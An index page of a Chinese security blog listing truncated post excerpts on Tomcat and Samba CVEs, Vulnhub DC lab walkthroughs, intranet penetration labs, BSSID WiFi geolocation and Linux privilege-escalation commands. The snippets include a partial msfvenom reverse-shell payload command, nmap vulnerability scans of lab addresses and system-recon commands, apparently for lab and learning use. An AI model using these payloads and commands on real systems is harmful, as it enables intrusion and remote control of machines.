天道酬勤

网络安全

阿里云ECS搭建Web服务-HackerGu‘s Blog

阿里云ECS搭建Web服务

Gu阅读(18)评论(0)赞(0)

一、安装Apache service --status-all 查看当前服务器运行的所有服务 apt-get update 更新一下软件源 apt-get install apache2 安装apache服务 apachectl -v 查看...

CVE-2020-1938-HackerGu‘s Blog

CVE-2020-1938

Gu阅读(19)评论(0)赞(1)

一、Tomcat Apache Tomcat 是一个免费的开源 Web 应用服务器,在中小型企业和个人开发用户中有着广泛的应用。 二、漏洞的影响范围 受影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7....

Samba远程代码执行漏洞(CVE-2017-7494)-HackerGu‘s Blog

Samba远程代码执行漏洞(CVE-2017-7494)

Gu阅读(35)评论(0)赞(1)

Samba远程代码执行漏洞(CVE-2017-7494) 一、漏洞描述 2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4...

Msf和CS上线不出网的机器-HackerGu‘s Blog

Msf和CS上线不出网的机器

Gu阅读(73)评论(0)赞(0)

内网中的很多机器是不可以出网的,那该如何在Msf和CS中上线呢? MSF 我们的目标机器是一台linux服务器,我们先生成elf马。 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=1...

CFS靶机—多层内网渗透靶机-HackerGu‘s Blog

CFS靶机—多层内网渗透靶机

Gu阅读(74)评论(0)赞(1)

  CFS靶机搭建—https://www.anquanke.com/post/id/187908#h2-10 靶机搭建 靶机搭建是我最头疼的地方,下面写一下配置的关键点。 在vm虚拟机中,最为重要的就是这里:虚拟网络编辑器 其中...

【Vulnhub】— DC-4-HackerGu‘s Blog

【Vulnhub】— DC-4

Gu阅读(29)评论(0)赞(0)

主机发现 在kali中使用netdiscover,发现机器192.168.234.179 端口扫描 使用Nmap,利用命令nmap -sV -A 192.168.234.179 --script=vuln root@kali:~# nmap...

【Vulnhub】—  DC-3-HackerGu‘s Blog

【Vulnhub】— DC-3

Gu阅读(30)评论(0)赞(1)

  主机发现 DC-3靶机的配置过程中出现了一点点的小问题,靶机一直寻找不到IP地址,看了网上大佬的解释,应该是网卡不匹配的原因,于是利用linux系统的拯救模式修改了网卡的配置信息,重启网卡,重启机器便获得了靶机的IP地址。待我...

利用bssid进行WiFi模糊定位-HackerGu‘s Blog

利用bssid进行WiFi模糊定位

Gu阅读(34)评论(0)赞(0)

  通过WiFi的bssid,我们可以对目标机器进行一个大致的定位,并获得其他意料之外的信息。 查看电脑能搜索到的所有WiFi netsh wlan show networks mode=bssid 经过实际的测试,在电脑联网状态...

【Vulnhub】—  DC-2-HackerGu‘s Blog

【Vulnhub】— DC-2

Gu阅读(35)评论(0)赞(1)

主机发现 老样子,还是使用netdiscover 找到其IP为192.168.234.177 端口扫描 使用Nmap:nmap -Pn -A 192.168.234.177 root@kali:~# nmap -Pn -A 192.168....

Linux提权相关的基础命令-HackerGu‘s Blog

Linux提权相关的基础命令

Gu阅读(64)评论(0)赞(0)

记录一下关于Linux提权相关的命令 获取系统信息 cat /etc/issue 查看发行版 cat /etc/*-release 查看发行版 cat /proc/version uname -a 查看内核版本 rpm -q kernel ...

专注黑客技术的研究

联系我们联系我们